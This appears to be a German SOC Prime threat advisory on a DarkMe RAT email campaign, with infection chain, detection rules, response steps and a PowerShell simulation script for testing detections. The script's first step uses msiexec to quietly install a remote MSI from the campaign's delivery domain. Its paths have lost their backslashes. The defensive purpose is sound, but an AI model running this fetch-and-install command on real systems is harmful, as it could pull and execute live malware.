SOC Prime Bias: High

25 Sep 2026 08:20 UTC

DarkMe-E-Mail-Kampagne erweitert Zielgruppen in APT-RAT-Angriffen

Author Photo
SOC Prime Team linkedin icon Folgen
DarkMe-E-Mail-Kampagne erweitert Zielgruppen in APT-RAT-Angriffen
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Eine neue Kampagne, die den DarkMe Spy-RAT ausliefert, wurde beobachtet, die sich auf Social Engineering statt auf Software-Exploits stützt. Angreifer verteilen eine .pif Datei per E-Mail, die eine mehrstufige Infektionskette auslöst, die MSIEXEC und mehrere auf VB6 basierende Loader umfasst. Der Wegfall von Zero-Day-Exploits hin zu großflächigem Social Engineering deutet auf einen Wechsel zu kostengünstigeren, breiteren und weniger selektiven Angriffsmethoden hin.

Untersuchung

Huntress identifizierte die Kampagne, nachdem eine .pif Datei entdeckt wurde, die den Windows Installer startet, um ein Remote-MSI-Paket abzurufen. Die Analyse ergab eine komplexe mehrstufige Kette, die ein Skript zur Bereitstellung namens prnfig.wsf, Registrierungsimporte und die Ausführung eines COM-Objekts über rundll32.exe /staumfasst. Die Endphase verwendet Process Hollowing, um das DarkMe-Payload in die signierte Microsoft-Binärdatei clspack.exe.

zu injizieren.

Verteidiger sollten auf rundll32.exe achten, das mit dem /sta Schalter und einer GUID ohne begleitenden DLL-Pfad gestartet wird. Sicherheitsteams sollten auch erkennen, wenn msiexec entfernte MSI-Pakete über HTTPS abruft und die Ausführung von .pif Dateien untersuchen. Signierte Microsoft-Binärdateien, die von ungewöhnlichen Orten wie %AppData% aus gestartet werden, sollten zusätzliche Aufmerksamkeit erhalten.

Reaktion

Wenn verdächtige Aktivitäten festgestellt werden, isolieren Sie den betroffenen Endpunkt sofort, um die C2-Kommunikation zu unterbrechen und Datenexfiltration zu verhindern. Beenden Sie den gehüllten clspack.exe Prozess und entfernen Sie bösartige Artefakte aus %AppData%ComponentsFolder and %AppData%Microsoft. Entfernen Sie die Persistenz, die durch den benutzerdefinierten URL-Protokoll-Handler und den HKCU Run Schlüssel erstellt wurde. Setzen Sie die Anmeldeinformationen des betroffenen Benutzers zurück und behandeln Sie lokal gespeicherte Kryptowährungs-Wallets als potenziell kompromittiert.

Angriffsablauf

Wir aktualisieren diesen Teil noch.

Erkennungen

Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (via registry_event)

SOC Prime-Team
24. Sep 2026

Ungewöhnliche Erweiterung von ausführbaren Binärdateien (via process_creation)

SOC Prime-Team
24. Sep 2026

LOLBAS WScript / CScript (via process_creation)

SOC Prime-Team
24. Sep 2026

Möglicher Remote-MSI-Datei-Installationsversuch (via cmdline)

SOC Prime-Team
24. Sep 2026

Verdächtige Befehls- und Steuerungskommunikation durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (via dns)

SOC Prime-Team
24. Sep 2026

IOCs (HashSha256) zum Erkennen: DarkMe E-Mail-Kampagne erweitert Zielgebiet für APT RAT

SOC Prime AI-Regeln
24. Sep 2026

IOCs (SourceIP) zum Erkennen: DarkMe E-Mail-Kampagne erweitert Zielgebiet für APT RAT

SOC Prime AI-Regeln
24. Sep 2026

IOCs (DestinationIP) zum Erkennen: DarkMe E-Mail-Kampagne erweitert Zielgebiet für APT RAT

SOC Prime AI-Regeln
24. Sep 2026

Erkennung von C2-Kommunikation und Bereitstellungsdomäne für DarkMe RAT [Windows-Netzwerkverbindung]

SOC Prime AI-Regeln
24. Sep 2026

Erkennung von bösartigen Aktivitäten der DarkMe RAT-Kampagne [Windows-Prozesserstellung]

SOC Prime AI-Regeln
24. Sep 2026

Simulation-Ausführung

  • Angriffsnarrativ & Befehle: Der Gegner beabsichtigt, den DarkMe RAT einzusetzen, um Persistenz zu bewahren. Um signaturbasierte Erkennung zu umgehen, nutzt der Angreifer msiexec um ein Remote-Payload von einer kompromittierten Domain zu ziehen (onlineview365.com). Nach der ersten Infektion verwendet der Angreifer rundll32.exe um ein bestimmtes COM-Objekt über eine GUID zu initiieren, um Code im Speicher auszuführen, und nutzt anschließend cmd.exe um Registrierungs-Konfigurationen aus einer Textdatei zu importieren, um die Umgebung für eine wscript.exe basierte Payload-Ausführung vorzubereiten.

  • Regressionstest-Skript:

    # DarkMe RAT Simulationsskript
    # Dieses Skript simuliert genau die in der Sigma-Regel definierten Befehlszeilen.
    
    Write-Host "[+] DarkMe RAT-Simulation wird gestartet..." -ForegroundColor Cyan
    
    # 1. Remote-Download von msiexec simulieren
    Write-Host "[*] Remote-Download von msiexec wird simuliert..."
    Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue
    
    # 2. Ausführung von rundll32 COM-Objekt simulieren
    Write-Host "[*] Ausführung von rundll32 COM wird simuliert..."
    Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue
    
    # 3. cmd.exe Registrierungsimport simulieren
    Write-Host "[*] Registrierungsimport von cmd.exe wird simuliert..."
    $tempFile = "$env:TEMPfiletext2.txt"
    "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii
    Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait
    
    # 4. Ausführung von wscript.exe via cmd/rundll32 Parent-Chain simulieren
    Write-Host "[*] Ausführung von wscript.exe aus AppData wird simuliert..."
    $scriptPath = "$env:APPDATAmalicious_script.vbs"
    "WScript.Echo `"DarkMe Simulated`"" | Out-File -FilePath $scriptPath -Encoding ascii
    
    # Um die spezifische Parent/Child-Regel auszulösen:
    # Parent: C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}
    # Child: wscript.exe %AppData%malicious_script.vbs
    Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait
    
    Write-Host "[+] Simulation abgeschlossen." -ForegroundColor Green
  • Bereinigungskommandos:

    # Bereinigen von Simulationsartefakten
    Write-Host "[+] Bereinigung läuft..." -ForegroundColor Yellow
    Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAmalicious_script.vbs" -ErrorAction SilentlyContinue
    Write-Host "[+] Bereinigung abgeschlossen." -ForegroundColor Green